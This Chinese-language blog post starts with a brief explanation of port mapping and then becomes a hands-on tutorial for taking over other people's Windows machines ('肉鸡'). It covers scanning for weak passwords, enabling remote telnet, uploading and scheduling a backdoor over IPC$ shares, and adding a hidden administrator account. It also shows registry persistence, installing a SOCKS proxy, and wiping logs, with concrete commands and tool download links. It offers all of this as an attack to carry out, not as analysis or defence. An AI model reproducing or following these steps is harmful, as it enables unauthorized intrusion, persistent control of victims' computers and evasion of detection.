1年前 (2017-08-06)  黑客攻击    抢沙发
文章评分 3 次,平均分 4.7

有个朋友问了我个问题:端口映射是什么意思??

其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。

所以解决这个问题的方法就是采用PM了。

有篇文章不错。大家看看:http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html

继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢?我推荐Remote Administrator,有篇介绍它的文章很好:http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp下载:http://www.skycn.com/soft/15592.html

我想里面的说明你应该能很好理解的,现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。

第一步:扫描弱口令

这里我用20cn开发的scanipc (这http://down.yqdown.com/xdown/yqdown0316/scanipc.rar有下的)不一会就会扫到很多有弱口令的主机(你可以拿你们学校的IP试试)这里我用opentelnet(远程启动TELNET的小东西,这里下:http://www.infosw.com/down/software.asp?id=1520)给扫描到开了空口令的主机开个端口让我们telnet连接上去,开了23端口,并可以连接上的主机就不用进行次步骤了!

Opentelnet使用方法:

OpenTelnet.exe \\server <帐号> <密码> <NTLM认证方式> <Telnet端口>

列如:

C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用户名:administrator 密码:123456

NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90

运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。

这样,我们就能够得到一个开90端口的Telnet服务器了。

Telnet 192.168.1.2 90

这样就可以登录上去了。

第三步:配置并安装后门程序

这里我选择WinShell(小巧精干我喜欢下载:http://www.hktk.com/soft/soft_server/winshell.html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!

列如:

c:\>ftp

ftp>openwww.cnwill.com

然后输入用户名字 密码把后门传上去mput c:\cnwill.exe

现在我们登陆到肉鸡上 Telnet 192.168.1.2 90

把刚上传的后门程序下载并运行(别忘记删除 后门程序)

『后门也可以用net命令完成』

net user \\192.168.1.2 90\ipc$ "" /user:"administrator"

[ 建 立 IPC$ 连 接 ]

copy d:\zilong.exe \\192.168.1.2 90\admin$\system32

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

copy d:\long.exe \\192.168.1.2 90\admin$\system32

[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]

copy d:\scoks.exe \\192.168.1.2 90\admin$\system32

[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]

copy d:\zilong.reg \\192.168.1.2 90\admin$\system32

[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明

net time \\192.168.1.2 90

[ 得 到 对 方 主 机 的 当 前 时 间]

at \\192.168.1.2 90 13:20 zilong.exe

[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦

==============

如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦

=============

telnet 192.168.1.2 90

[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]

net user  ****  /add

[近来后添加一个用户名再说或者也可以选择激活guest]

net localgroup administrators ****  /add

[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]

regedit /s c:\winnt\system32\zilong.reg

[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们

的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门

服务就又继续运行了.

SOCKS -install

[ 开 始 安 装 socks 代 理]

SCOKS -config starttype 2

[ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了]

socks -config port 1080

[ socks 代 理 端 口 设 置 为 1080 ]

net start skserver

[ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了

long

[ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了]

 

除特别注明外,本站所有文章均为铁匠运维网原创,转载请注明出处来自http://www.tiejiang.org/18264.html

关于

发表评论

暂无评论

切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享